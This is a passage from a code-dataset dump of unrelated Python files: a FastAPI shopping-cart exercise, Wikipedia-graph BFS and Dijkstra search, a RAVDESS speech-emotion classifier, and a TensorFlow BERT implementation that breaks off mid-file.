
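# Editor's note: the binary-search variant below narrows [low, high] until the gap is under diff = 1e-6, so its answer should agree with the heap-based result to roughly that tolerance\n 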
print(solution.minimize_max_distance_optimal(5))\n","repo_name":"kamrul-pu/problem-solving","sub_path":"data_structure/min_max_distance_between_gas_station.py","file_name":"min_max_distance_between_gas_station.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23588216479","text":"\nfrom fastapi import FastAPI, HTTPException\n\n\napp = FastAPI()\n\nusuario = [\n {\"nome\": \"Dolly\", \"email\": \"dollyna@gmail.com\", \"id\": 1}\n]\n\nprodutos = [\n {\"item\" : \"petisco\", \"item_id\": 1, \"descricao\": None, \"preco\": 30, \"qty\" : 3},\n {\"item\" : \"ração\", \"item_id\": 2, \"descricao\": None, \"preco\": 210, \"qty\" : 1},\n {\"item\" : \"patê\", \"item_id\": 3, \"descricao\": None, \"preco\": 10, \"qty\" : 5}\n]\n\ncarrinho = [\n {\"user_id\": 3, \"item_id\": 1, \"qty\": 2, \"preco\": 200},\n {\"user_id\": 3, \"item_id\": 2, \"qty\": 5, \"preco\": 100}\n]\n\nendereco = [\n {\"rua\": \"rua da Dolly\", \"cep\": \"1234\", \"cidade\": \"Altinopolis\", \"estado\": \"SP\", \"address_id\": 1, \"user_id\": 1},\n {\"rua\": \"rua da Molly\", \"cep\": \"1234\", \"cidade\": \"Altinopolis\", \"estado\": \"SP\", \"address_id\": 2, \"user_id\": 1}\n]\n\n#---------------------------------------------- Página inicial de saudações --------------------------\n@app.get(\"/\")\nasync def saudacoes():\n site = \"Saudações! Sejam bem-vindas e bem-vindos :)\"\n return site\n\n\n#------------------------------------------------------- Usuario ----------------------------------------------\n@app.post('/create_user/', status_code=201) #criando os usuários \nasync def add_user(user : dict):\n\n for temp_user in usuario:\n if temp_user['nome'] == user['nome']:\n raise HTTPException(status_code=400, detail= f\"{user['nome']} já existe!\")\n\n usuario.append(user)\n \n return f\"{user['nome']} adicionado (a) corretamente!\"\n\n@app.post('/users/{user_id}/endereco/{address_id}', status_code=201) #criando os endereços dos usuários \nasync def add_user_address(user_address : dict) -> dict:\n endereco.append(user_address)\n return f\"Endereço do usuário adicionado corretamente!\"\n\n\n@app.get('/users', status_code=200) #pegando todos usuários cadastrados\nasync def get_users() -> dict:\n return {\"Usuários\": usuario}\n\n@app.get('/users/{user_id}', status_code=200) #pegando um usuario pelo id \nasync def get_users(user_id: int):\n for temp_user in usuario:\n if temp_user['id'] == user_id:\n return f\"Usário com id {user_id} existe\"\n\n raise HTTPException(status_code=404, detail=f\"Usuário com id {user_id} não encontrado!\")\n\n@app.get('/users/name/{user_name}', status_code=200) #pegando um usuario pelo nome\nasync def get_users_name(user_name: str):\n for temp_user in usuario:\n if temp_user['nome'] == user_name:\n return f\"Usuário com nome {user_name} existe\"\n\n raise HTTPException(status_code=404, detail=f\"Usuário com nome {user_name} não encontrado!\")\n\n@app.delete('/delete/{user_id}',status_code=200) #removendo um usuário pelo id\nasync def delete_user(user_id: int):\n for temp_user in usuario:\n if temp_user['id'] == user_id:\n usuario.remove(temp_user)\n return f\"Usuário com id {user_id} corretamente deletado!\"\n\n raise HTTPException(status_code=404, detail=f\"Usuário com id {user_id} não encontrado!\")\n\n@app.get('/users/{user_id}/endereco/{address_id}', status_code=200) #pegando um endereço de usuario\nasync def get_users_address(user_id: int):\n ends = []\n for i in endereco:\n if 
i['user_id'] == user_id:\n ends.append(i)\n return {\"Endereços do usuário\":ends}\n\n@app.delete('/delete/usuario/{user_id}/endereco/{address_id}',status_code=200) #removendo um endereço de usuário pelo id\nasync def delete_endereco(address_id: int):\n for temp_address in endereco:\n if temp_address['address_id'] == address_id:\n endereco.remove(temp_address)\n return f\"Endereço com id {address_id} corretamento deletado!\"\n\n raise HTTPException(status_code=404, detail=f\"Endereço com id {address_id} não encontrado!\")\n\n\n#----------------------------------------------------- Cadastro de items ---------------------------------------------------------\n@app.post('/create_item', status_code=200) #cadastrando produtos\nasync def register_item(item : dict):\n\n for temp_item in produtos:\n if temp_item['item'] == item['item']:\n raise HTTPException(status_code=400, detail= f\"{item['item']} já registrado!\")\n\n produtos.append(item)\n \n return f\"{item['item']} adicionado corretamente!\"\n\n@app.get('/items', status_code=200) #pegando todos os itens cadastrados\nasync def get_items():\n return {\"Produtos\": produtos}\n\n@app.delete('/delete_item/{item_id}',status_code=200) #removendo um produto pelo código id\nasync def delete_item(item_id:int):\n for temp_item in produtos:\n if temp_item['item_id'] == item_id:\n produtos.remove(temp_item)\n return f\"Item com id {item_id} corretamente deletado!\"\n\n raise HTTPException(status_code=404, detail=f\"Item com id {item_id} não encontrado!\")\n\n\n#------------------------------------------------------ Carrinho de compras ---------------------------------------------------------\n@app.post('/carrinho/{user_id}/{item_id}/', status_code=201) #criando os carrinhos\nasync def add_cart(cart: dict):\n\n for temp_cart in carrinho:\n if temp_cart['user_id'] == cart['user_id']:\n raise HTTPException(status_code=400, detail= f\"Carrinho já existe!\")\n\n carrinho.append(cart)\n \n return f\"Novo carrinho criado!\"\n\n@app.get('/carrinho/{user_id}', status_code=200) #pegando o carrinho de compra associado ao id do usuario \nasync def get_carrinho(user_id: int):\n total = 0\n itens = []\n for i in carrinho:\n if i['user_id'] == user_id:\n total += i['qty'] * i['preco']\n itens.append(i)\n return {\"Carrinho\":itens, \"Preço total\": total}\n\n@app.post('/carrinho/{user_id}/{item_id}', status_code=200) #adicionando produtos ao carrinho\nasync def add_item_to_cart(cart : dict):\n carrinho.append(cart)\n \n return f\"Novo produto adicionado!\"\n\n@app.put('/update_item', status_code=200) #alterando a quantidade dos produtos no carrinho\nasync def update_item(item_id: int, item_quantity:int, user_id: int):\n\n for i in carrinho:\n if i['item_id'] == item_id and i['user_id'] == user_id:\n i['qty'] = item_quantity\n return f\"Item com id {item_id} corretamente modificado!\"\n\n raise HTTPException(status_code=404, detail=f\"Item com id {item_id} não encontrado!\")\n\n@app.delete('/carrinho/{user_id}/delete_item/{item_id}',status_code=200) #removendo um produto pelo código id\nasync def delete_item(user_id: int, item_id: int):\n for temp_item in carrinho:\n if temp_item['item_id'] == item_id and temp_item['user_id'] == user_id:\n carrinho.remove(temp_item)\n return f\"Item {item_id} corretamente deletado!\"\n\n raise HTTPException(status_code=404, detail=f\"Item with id {item_id} não encontrado!\")\n\n\n@app.delete(\"/delete/carrinho/{user_id}/\", status_code=200) #deletando o carrinho de compras \nasync def delete_carrinho(user_id: int):\n for i in 
carrinho:\n if i['user_id'] == user_id:\n carrinho.remove(i)\n return f\"Carrinho corretamente deletado!\"\n \n raise HTTPException(status_code=404, detail=f\"Usuário não tem carrinho.\")","repo_name":"naomyduarteg/Luiza-code-edicao-5","sub_path":"Projetos/Projeto1_FAST_API/projeto1.py","file_name":"projeto1.py","file_ext":"py","file_size_in_byte":7058,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26331187961","text":"# coding: utf-8\nimport math\nimport read_txt\n\ndef find_name(name):\n \"\"\"\n Return the id of the given word if it is found in pages.txt.\n name: word to search for (str)\n \"\"\"\n data = read_txt.read_names('wikipedia_links/pages.txt')\n for d in data:\n if d['name'] == name:\n print('Find %s!' % name, end='')\n print('The id is %d.' % d['id'])\n return d['id']\n return None\n\n\ndef bfs(graph, start, end):\n \"\"\"\n start: id of the page to search from (int)\n end: id of the page to find (int)\n \"\"\"\n searched_list = [] # list of visited nodes\n data = {start: []} # key: node, value: list of nodes traversed to reach that node\n queue = [start] # candidates to explore\n step = 0 # number of steps\n while queue:\n current = queue.pop(0) # current position\n if current == end:\n print(start, end='')\n for id in data[current]: # list of nodes traversed to reach end\n print('->%d' % id, end='')\n return data[current] \n if current not in searched_list:\n searched_list.append(current)\n if current in graph.keys():\n queue += graph[current]\n if len(graph[current]) > 0:\n for id in graph[current]:\n if not id in data.keys():\n data[id] = data[current] + [current]\n\n\ndef dijkstra(route_map):\n searched_list = [] # visited\n not_searched = list(range(len(route_map))) # not yet visited\n distance = [math.inf] * len(route_map)\n distance[0] = 0\n from_list = [0] * len(route_map)\n\n while len(searched_list) != len(route_map):\n v = 0\n minimum = math.inf\n for i in not_searched:\n if distance[i] < minimum: # update the minimum distance\n v = i\n minimum = distance[i]\n # print(distance)\n searched_list.append(v)\n not_searched.remove(v)\n for i in not_searched:\n d = route_map[v][i]\n if d != 0 and distance[v] + d < distance[i]:\n distance[i] = distance[v] + d\n from_list[i] = v\n current = len(route_map) - 1\n result = [current + 1]\n\n while current != 0:\n current = from_list[current]\n result.append(current + 1)\n result.reverse()\n\n return result\n\n\nif __name__ == \"__main__\":\n start = find_name('Google')\n end = find_name('渋谷')\n link_data = read_txt.read_links('wikipedia_links/links.txt')\n graph = read_txt.graph(link_data)\n bfs(graph, start, end)\n\n","repo_name":"segatomo/STEP","sub_path":"hw4/wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9420715380","text":"import os\nimport scipy\nimport pickle\nimport sklearn\nimport speechpy\nimport numpy as np\nimport soundfile as sf\nimport scipy.io.wavfile\nimport matplotlib.pyplot as plt\n\nfrom scipy import io\nfrom sklearn import svm\nfrom visualization import *\nfrom pydub import AudioSegment\nfrom sklearn.svm import LinearSVC\nfrom pydub.utils import make_chunks\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.learning_curve import learning_curve\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score, confusion_matrix\n\n__author__ = \"Reza\"\n__copyright__ = \"Md Rezaur Rahman, TUM(Computer 
Science)\"\n__email__ = \"reza.rahman@tum.de\"\n__maintainer__ = \"Reza\"\n__status__ = \"Dev\"\n\n\nFRAME_SIZE = 16000\nMFCC_LEN = 39\n\n\n# The class for training the classifier\n# Only RAVDESS dataset has been used\n\nroot_folder = os.getcwd()\ndataset_path = os.path.join(root_folder, \"Dataset/RAVDESS/\")\n\n\ndef calc_variance(data):\n N = len(data)\n mean = np.mean(data)\n total = 0.0\n for i in range(N):\n total += abs(data[i] - mean)**2\n s = float(total/(N-1))\n return s\n\nclass RavdessEmoClassifier():\n def __init__(self):\n self.dataset_folder_path = dataset_path\n self.dataset_class_labels = [\"Neutral\", \"Angry\", \"Happy\", \"Sad\", \"Calm\", \"Fearful\", \"Disgust\", \"Surprised\"]\n #self.dataset_class_labels = [\"Neutral\", \"Angry\", \"Happy\", \"Sad\"] # Label for Berlin DB\n self.max_signal_length = 50000 # Hypertuned for RAVDESS dataset\n\n def show_info(self, aname, a):\n print(\"Array\", aname)\n print(\"shape:\", a.shape)\n print(\"dtype:\", a.dtype)\n print(\"min, max:\", a.min(), a.max())\n\n def extract_mfcc_feature(self):\n mfcc_dataset = []\n dataset_label = []\n\n print(\"dataset_folder_path: \", self.dataset_folder_path)\n print(\"=========== Commencing reading the RAVDESS Dataset ============\")\n for i, directory in enumerate(self.dataset_class_labels):\n cnt = 0\n print(\"The Directory is : \", directory)\n os.chdir(self.dataset_folder_path + \"/\" + directory)\n\n for filename in os.listdir('.'):\n ## The Signal data is returned as a numpy array with a data-type determined from the file.\n data, sample_rate = sf.read(filename)\n #print(\"sample rate: \", sample_rate)\n # Checking whether data channel is stereo or mono\n if type(data[0]).__name__ == 'ndarray':\n signal = data[:, 1]\n else:\n signal = data\n\n # self.show_info(\"data\", signal)\n # The signals are padded if it is less than required\n # Otherwise slice the signals\n signal_len = len(signal)\n pad_length = abs(self.max_signal_length - signal_len)\n pad_remainder = pad_length % 2\n pad_length = int(pad_length / 2)\n\n if (signal_len < self.max_signal_length):\n signal = np.pad(signal, (pad_length, pad_length + pad_remainder), 'constant', constant_values=0)\n else:\n signal = signal[pad_length:pad_length + self.max_signal_length]\n cnt = cnt + 1\n\n ## mfcc_len: Number of mfcc features to take for each frame\n mfcc_len = 39\n #mfcc = speechpy.feature.mfcc(signal, sample_rate, num_cepstral=mfcc_len)\n mfcc = speechpy.feature.mfcc(signal, 32000, num_cepstral=MFCC_LEN)\n mfcc = mfcc.flatten()\n #print(\"len(mfcc) : \", len(mfcc))\n mfcc_dataset.append(mfcc)\n dataset_label.append(i) # Labelling the mfcc feature\n\n print(\"Number of Samples for training in\", directory, \"directory is : \", cnt)\n\n return mfcc_dataset, dataset_label\n\n def training_feature_visualization(self, mfcc_dataset, dataset_label):\n features_embedding_visualize_3d(mfcc_dataset, dataset_label, root_folder)\n #features_embedding_visualize_2d(mfcc_dataset, dataset_label, root_folder)\n\n def train_test_val_split(self, mfcc_dataset, dataset_label):\n # Only train & test set\n x_train, x_test, y_train, y_test = train_test_split(mfcc_dataset, dataset_label, train_size=0.8, random_state=42)\n return x_train, x_test, y_train, y_test\n\n\n def run_model(self, model_name, x_train, y_train, x_test, y_test):\n model = None\n if model_name == \"SVM_Linear\":\n model = (svm.SVC(kernel='linear'))\n elif model_name == \"LinSVC\":\n model = LinearSVC(multi_class='crammer_singer')\n elif model_name == \"SVM_RBF\":\n model = 
(svm.SVC(kernel='rbf'))\n elif model_name == \"Gauss_NB\":\n model = GaussianNB()\n elif model_name == \"RandomForest\":\n model = RandomForestClassifier(n_estimators=100)\n elif model_name == \"MLP\":\n model = MLPClassifier(activation='logistic', verbose=True, hidden_layer_sizes=(512,), batch_size=32)\n\n model.fit(x_train, y_train)\n y_prediction = model.predict(x_test)\n acc = accuracy_score(y_pred=y_prediction, y_true=y_test)\n return acc\n\n def k_fold_cross_validation(self, mfcc_dataset, dataset_label, model_name):\n print(\"===== Result For Model \", model_name, \" =====\")\n mfcc_dataset = np.array(mfcc_dataset)\n dataset_label = np.array(dataset_label)\n acc_list = []\n # 10-fold cross validation\n n_folds = 10\n skf = StratifiedKFold(n_splits=n_folds, shuffle=True)\n # Generate the folds once, outside the loop; calling skf.split() per iteration\n # reshuffles every time, so the folds would no longer form a true partition\n cv_splits = list(skf.split(mfcc_dataset, dataset_label))\n for fold in range(0, n_folds):\n train_indices = cv_splits[fold][0]\n test_indices = cv_splits[fold][1]\n\n #print(len(train_indices))\n #print(\"train indices: \", train_indices)\n #print(len(test_indices))\n #print(\"test indices: \", test_indices)\n\n x_train = mfcc_dataset[train_indices]\n y_train = dataset_label[train_indices]\n\n x_test = mfcc_dataset[test_indices]\n y_test = dataset_label[test_indices]\n accuracy = self.run_model(model_name, x_train, y_train, x_test, y_test)\n acc_list.append(accuracy)\n print(\"The Accuracy score in fold\", str(fold + 1), \"is: \", accuracy)\n\n print(\"Accuracy List : \", acc_list)\n avg_acc = np.mean(acc_list)\n variance = calc_variance(acc_list)\n print(\"Avg acc: \", avg_acc)\n print(\"Variance: \", variance)\n\n def display_metrics(self, y_pred, y_test):\n print(\"The Accuracy score is : \")\n print(accuracy_score(y_pred=y_pred, y_true=y_test))\n print(\"The Confusion Matrix is : \")\n print(confusion_matrix(y_pred=y_pred, y_true=y_test))\n\n def training_with_test_train_split(self, mfcc_dataset, dataset_label, model_name):\n x_train, x_test, y_train, y_test = self.train_test_val_split(mfcc_dataset, dataset_label)\n accuracy = self.run_model(model_name, x_train, y_train, x_test, y_test)\n print(\"The Accuracy score for \", model_name, \" model is: \", accuracy)\n\n\n\nif __name__ == \"__main__\":\n model = RavdessEmoClassifier()\n mfcc_dataset, dataset_label = model.extract_mfcc_feature()\n model.k_fold_cross_validation(mfcc_dataset, dataset_label, \"RandomForest\")\n model.k_fold_cross_validation(mfcc_dataset, dataset_label, \"SVM_Linear\")\n model.k_fold_cross_validation(mfcc_dataset, dataset_label, \"SVM_RBF\")\n model.k_fold_cross_validation(mfcc_dataset, dataset_label, \"Gauss_NB\")\n model.k_fold_cross_validation(mfcc_dataset, dataset_label, \"LinSVC\")\n model.k_fold_cross_validation(mfcc_dataset, dataset_label, \"MLP\")\n\n '''model.training_with_test_train_split(mfcc_dataset, dataset_label, \"RandomForest\")\n model.training_with_test_train_split(mfcc_dataset, dataset_label, \"SVM_Linear\")\n model.training_with_test_train_split(mfcc_dataset, dataset_label, \"SVM_RBF\")\n model.training_with_test_train_split(mfcc_dataset, dataset_label, \"Gauss_NB\")\n model.training_with_test_train_split(mfcc_dataset, dataset_label, \"LinSVC\")\n model.training_with_test_train_split(mfcc_dataset, dataset_label, \"MLP\")'''\n","repo_name":"rezaurrakib/EmoSpeech","sub_path":"model_ravdess.py","file_name":"model_ravdess.py","file_ext":"py","file_size_in_byte":8437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"4000491811","text":"from __future__ import 
absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport copy\nimport json\nimport math\nimport six\nimport tensorflow as tf\n\nfrom .utils import tf_utils\n\n\nclass BertConfig(object):\n\n def __init__(self,\n vocab_size,\n hidden_size=768,\n num_hidden_layers=12,\n num_attention_heads=12,\n intermediate_size=3072,\n hidden_act=\"gelu\",\n hidden_dropout_prob=0.1,\n attention_probs_dropout_prob=0.1,\n max_position_embeddings=512,\n type_vocab_size=16,\n initializer_range=0.02,\n backward_compatible=True):\n self.vocab_size = vocab_size\n self.hidden_size = hidden_size\n self.num_hidden_layers = num_hidden_layers\n self.num_attention_heads = num_attention_heads\n self.hidden_act = hidden_act\n self.intermediate_size = intermediate_size\n self.hidden_dropout_prob = hidden_dropout_prob\n self.attention_probs_dropout_prob = attention_probs_dropout_prob\n self.max_position_embeddings = max_position_embeddings\n self.type_vocab_size = type_vocab_size\n self.initializer_range = initializer_range\n self.backward_compatible = backward_compatible\n\n @classmethod\n def from_dict(cls, json_object):\n config = BertConfig(vocab_size=None)\n for (key, value) in six.iteritems(json_object):\n config.__dict__[key] = value\n return config\n\n @classmethod\n def from_json_file(cls, json_file):\n with tf.io.gfile.GFile(json_file, \"r\") as reader:\n text = reader.read()\n return cls.from_dict(json.loads(text))\n\n def to_dict(self):\n output = copy.deepcopy(self.__dict__)\n return output\n\n def to_json_string(self):\n return json.dumps(self.to_dict(), indent=2, sort_keys=True) + \"\\n\"\n\n\ndef get_bert_model(input_word_ids,\n input_mask,\n input_type_ids,\n config=None,\n name=None,\n float_type=tf.float32):\n bert_model_layer = BertModel(config=config, float_type=float_type, name=name)\n pooled_output, sequence_output = bert_model_layer(input_word_ids, input_mask,\n input_type_ids)\n bert_model = tf.keras.Model(\n inputs=[input_word_ids, input_mask, input_type_ids],\n outputs=[pooled_output, sequence_output])\n return bert_model\n\n\nclass BertModel(tf.keras.layers.Layer):\n def __init__(self, config, float_type=tf.float32, **kwargs):\n super(BertModel, self).__init__(**kwargs)\n self.config = (\n BertConfig.from_dict(config)\n if isinstance(config, dict) else copy.deepcopy(config))\n self.float_type = float_type\n\n def build(self, unused_input_shapes):\n self.embedding_lookup = EmbeddingLookup(\n vocab_size=self.config.vocab_size,\n embedding_size=self.config.hidden_size,\n initializer_range=self.config.initializer_range,\n dtype=tf.float32,\n name=\"word_embeddings\")\n self.embedding_postprocessor = EmbeddingPostprocessor(\n use_type_embeddings=True,\n token_type_vocab_size=self.config.type_vocab_size,\n use_position_embeddings=True,\n max_position_embeddings=self.config.max_position_embeddings,\n dropout_prob=self.config.hidden_dropout_prob,\n initializer_range=self.config.initializer_range,\n dtype=tf.float32,\n name=\"embedding_postprocessor\")\n self.encoder = Transformer(\n num_hidden_layers=self.config.num_hidden_layers,\n hidden_size=self.config.hidden_size,\n num_attention_heads=self.config.num_attention_heads,\n intermediate_size=self.config.intermediate_size,\n intermediate_activation=self.config.hidden_act,\n hidden_dropout_prob=self.config.hidden_dropout_prob,\n attention_probs_dropout_prob=self.config.attention_probs_dropout_prob,\n initializer_range=self.config.initializer_range,\n backward_compatible=self.config.backward_compatible,\n 
float_type=self.float_type,\n name=\"encoder\")\n self.pooler_transform = tf.keras.layers.Dense(\n units=self.config.hidden_size,\n activation=\"tanh\",\n kernel_initializer=get_initializer(self.config.initializer_range),\n name=\"pooler_transform\")\n super(BertModel, self).build(unused_input_shapes)\n\n def __call__(self,\n input_word_ids,\n input_mask=None,\n input_type_ids=None,\n **kwargs):\n inputs = tf_utils.pack_inputs([input_word_ids, input_mask, input_type_ids])\n return super(BertModel, self).__call__(inputs, **kwargs)\n\n def call(self, inputs, mode=\"bert\", **kwargs):\n unpacked_inputs = tf_utils.unpack_inputs(inputs)\n input_word_ids = unpacked_inputs[0]\n input_mask = unpacked_inputs[1]\n input_type_ids = unpacked_inputs[2]\n\n word_embeddings = self.embedding_lookup(input_word_ids)\n embedding_tensor = self.embedding_postprocessor(\n word_embeddings=word_embeddings, token_type_ids=input_type_ids)\n if self.float_type == tf.float16:\n embedding_tensor = tf.cast(embedding_tensor, tf.float16)\n attention_mask = None\n if input_mask is not None:\n attention_mask = create_attention_mask_from_input_mask(\n input_word_ids, input_mask)\n\n if mode == \"encoder\":\n return self.encoder(\n embedding_tensor, attention_mask, return_all_layers=True)\n\n sequence_output = self.encoder(embedding_tensor, attention_mask)\n first_token_tensor = tf.squeeze(sequence_output[:, 0:1, :], axis=1)\n pooled_output = self.pooler_transform(first_token_tensor)\n\n return (pooled_output, sequence_output)\n\n def get_config(self):\n config = {\"config\": self.config.to_dict()}\n base_config = super(BertModel, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n\nclass EmbeddingLookup(tf.keras.layers.Layer):\n\n def __init__(self,\n vocab_size,\n embedding_size=768,\n initializer_range=0.02,\n **kwargs):\n super(EmbeddingLookup, self).__init__(**kwargs)\n self.vocab_size = vocab_size\n self.embedding_size = embedding_size\n self.initializer_range = initializer_range\n\n def build(self, unused_input_shapes):\n \"\"\"Implements build() for the layer.\"\"\"\n self.embeddings = self.add_weight(\n \"embeddings\",\n shape=[self.vocab_size, self.embedding_size],\n initializer=get_initializer(self.initializer_range),\n dtype=self.dtype)\n super(EmbeddingLookup, self).build(unused_input_shapes)\n\n def call(self, inputs):\n \"\"\"Implements call() for the layer.\"\"\"\n input_shape = tf_utils.get_shape_list(inputs)\n flat_input = tf.reshape(inputs, [-1])\n output = tf.gather(self.embeddings, flat_input)\n output = tf.reshape(output, input_shape + [self.embedding_size])\n return output\n\n\nclass EmbeddingPostprocessor(tf.keras.layers.Layer):\n\n def __init__(self,\n use_type_embeddings=False,\n token_type_vocab_size=None,\n use_position_embeddings=True,\n max_position_embeddings=512,\n dropout_prob=0.0,\n initializer_range=0.02,\n initializer=None,\n **kwargs):\n super(EmbeddingPostprocessor, self).__init__(**kwargs)\n self.use_type_embeddings = use_type_embeddings\n self.token_type_vocab_size = token_type_vocab_size\n self.use_position_embeddings = use_position_embeddings\n self.max_position_embeddings = max_position_embeddings\n self.dropout_prob = dropout_prob\n self.initializer_range = initializer_range\n\n if not initializer:\n self.initializer = get_initializer(self.initializer_range)\n else:\n self.initializer = initializer\n\n if self.use_type_embeddings and not self.token_type_vocab_size:\n raise ValueError(\"If `use_type_embeddings` is True, then \"\n 
\"`token_type_vocab_size` must be specified.\")\n\n def build(self, input_shapes):\n (word_embeddings_shape, _) = input_shapes\n width = word_embeddings_shape.as_list()[-1]\n self.type_embeddings = None\n if self.use_type_embeddings:\n self.type_embeddings = self.add_weight(\n \"type_embeddings\",\n shape=[self.token_type_vocab_size, width],\n initializer=get_initializer(self.initializer_range),\n dtype=self.dtype)\n\n self.position_embeddings = None\n if self.use_position_embeddings:\n self.position_embeddings = self.add_weight(\n \"position_embeddings\",\n shape=[self.max_position_embeddings, width],\n initializer=get_initializer(self.initializer_range),\n dtype=self.dtype)\n\n self.output_layer_norm = tf.keras.layers.LayerNormalization(\n name=\"layer_norm\", axis=-1, epsilon=1e-12, dtype=tf.float32)\n self.output_dropout = tf.keras.layers.Dropout(rate=self.dropout_prob,\n dtype=tf.float32)\n super(EmbeddingPostprocessor, self).build(input_shapes)\n\n def __call__(self, word_embeddings, token_type_ids=None, **kwargs):\n inputs = tf_utils.pack_inputs([word_embeddings, token_type_ids])\n return super(EmbeddingPostprocessor, self).__call__(inputs, **kwargs)\n\n def call(self, inputs, **kwargs):\n unpacked_inputs = tf_utils.unpack_inputs(inputs)\n word_embeddings = unpacked_inputs[0]\n token_type_ids = unpacked_inputs[1]\n input_shape = tf_utils.get_shape_list(word_embeddings, expected_rank=3)\n batch_size = input_shape[0]\n seq_length = input_shape[1]\n width = input_shape[2]\n\n output = word_embeddings\n if self.use_type_embeddings:\n flat_token_type_ids = tf.reshape(token_type_ids, [-1])\n one_hot_ids = tf.one_hot(\n flat_token_type_ids,\n depth=self.token_type_vocab_size,\n dtype=self.dtype)\n token_type_embeddings = tf.matmul(one_hot_ids, self.type_embeddings)\n token_type_embeddings = tf.reshape(token_type_embeddings,\n [batch_size, seq_length, width])\n output += token_type_embeddings\n\n if self.use_position_embeddings:\n position_embeddings = tf.expand_dims(\n tf.slice(self.position_embeddings, [0, 0], [seq_length, width]),\n axis=0)\n\n output += position_embeddings\n\n output = self.output_layer_norm(output)\n output = self.output_dropout(output,training=kwargs.get('training', False))\n\n return output\n\n\nclass Attention(tf.keras.layers.Layer):\n\n def __init__(self,\n num_attention_heads=12,\n size_per_head=64,\n attention_probs_dropout_prob=0.0,\n initializer_range=0.02,\n backward_compatible=False,\n **kwargs):\n super(Attention, self).__init__(**kwargs)\n self.num_attention_heads = num_attention_heads\n self.size_per_head = size_per_head\n self.attention_probs_dropout_prob = attention_probs_dropout_prob\n self.initializer_range = initializer_range\n self.backward_compatible = backward_compatible\n\n def build(self, unused_input_shapes):\n self.query_dense = self._projection_dense_layer(\"query\")\n self.key_dense = self._projection_dense_layer(\"key\")\n self.value_dense = self._projection_dense_layer(\"value\")\n self.attention_probs_dropout = tf.keras.layers.Dropout(\n rate=self.attention_probs_dropout_prob)\n super(Attention, self).build(unused_input_shapes)\n\n def reshape_to_matrix(self, input_tensor):\n ndims = input_tensor.shape.ndims\n if ndims < 2:\n raise ValueError(\"Input tensor must have at least rank 2.\"\n \"Shape = %s\" % (input_tensor.shape))\n if ndims == 2:\n return input_tensor\n\n width = input_tensor.shape[-1]\n output_tensor = tf.reshape(input_tensor, [-1, width])\n return output_tensor\n\n def __call__(self, from_tensor, to_tensor, 
attention_mask=None, **kwargs):\n inputs = tf_utils.pack_inputs([from_tensor, to_tensor, attention_mask])\n return super(Attention, self).__call__(inputs, **kwargs)\n\n def call(self, inputs,**kwargs):\n (from_tensor, to_tensor, attention_mask) = tf_utils.unpack_inputs(inputs)\n query_tensor = self.query_dense(from_tensor)\n\n key_tensor = self.key_dense(to_tensor)\n\n value_tensor = self.value_dense(to_tensor)\n\n attention_scores = tf.einsum(\"BTNH,BFNH->BNFT\", key_tensor, query_tensor)\n attention_scores = tf.multiply(attention_scores,\n 1.0 / math.sqrt(float(self.size_per_head)))\n\n if attention_mask is not None:\n attention_mask = tf.expand_dims(attention_mask, axis=[1])\n adder = (1.0 - tf.cast(attention_mask, attention_scores.dtype)) * -10000.0\n\n attention_scores += adder\n\n attention_probs = tf.nn.softmax(attention_scores)\n\n attention_probs = self.attention_probs_dropout(attention_probs,training=kwargs.get('training', False))\n\n context_tensor = tf.einsum(\"BNFT,BTNH->BFNH\", attention_probs, value_tensor)\n\n return context_tensor\n\n def _projection_dense_layer(self, name):\n \"\"\"A helper to define a projection layer.\"\"\"\n return Dense3D(\n num_attention_heads=self.num_attention_heads,\n size_per_head=self.size_per_head,\n kernel_initializer=get_initializer(self.initializer_range),\n output_projection=False,\n backward_compatible=self.backward_compatible,\n name=name)\n\n\nclass Dense3D(tf.keras.layers.Layer):\n def __init__(self,\n num_attention_heads=12,\n size_per_head=72,\n kernel_initializer=None,\n bias_initializer=\"zeros\",\n activation=None,\n use_bias=True,\n output_projection=False,\n backward_compatible=False,\n **kwargs):\n super(Dense3D, self).__init__(**kwargs)\n self.num_attention_heads = num_attention_heads\n self.size_per_head = size_per_head\n self.hidden_size = num_attention_heads * size_per_head\n self.kernel_initializer = kernel_initializer\n self.bias_initializer = bias_initializer\n self.activation = activation\n self.use_bias = use_bias\n self.output_projection = output_projection\n self.backward_compatible = backward_compatible\n\n @property\n def compatible_kernel_shape(self):\n if self.output_projection:\n return [self.hidden_size, self.hidden_size]\n return [self.last_dim, self.hidden_size]\n\n @property\n def compatible_bias_shape(self):\n return [self.hidden_size]\n\n @property\n def kernel_shape(self):\n if self.output_projection:\n return [self.num_attention_heads, self.size_per_head, self.hidden_size]\n return [self.last_dim, self.num_attention_heads, self.size_per_head]\n\n @property\n def bias_shape(self):\n if self.output_projection:\n return [self.hidden_size]\n return [self.num_attention_heads, self.size_per_head]\n\n def build(self, input_shape):\n \"\"\"Implements build() for the layer.\"\"\"\n dtype = tf.as_dtype(self.dtype or tf.keras.backend.floatx())\n if not (dtype.is_floating or dtype.is_complex):\n raise TypeError(\"Unable to build `Dense3D` layer with non-floating \"\n \"point (and non-complex) dtype %s\" % (dtype,))\n input_shape = tf.TensorShape(input_shape)\n if tf.compat.dimension_value(input_shape[-1]) is None:\n raise ValueError(\"The last dimension of the inputs to `Dense3D` \"\n \"should be defined. 
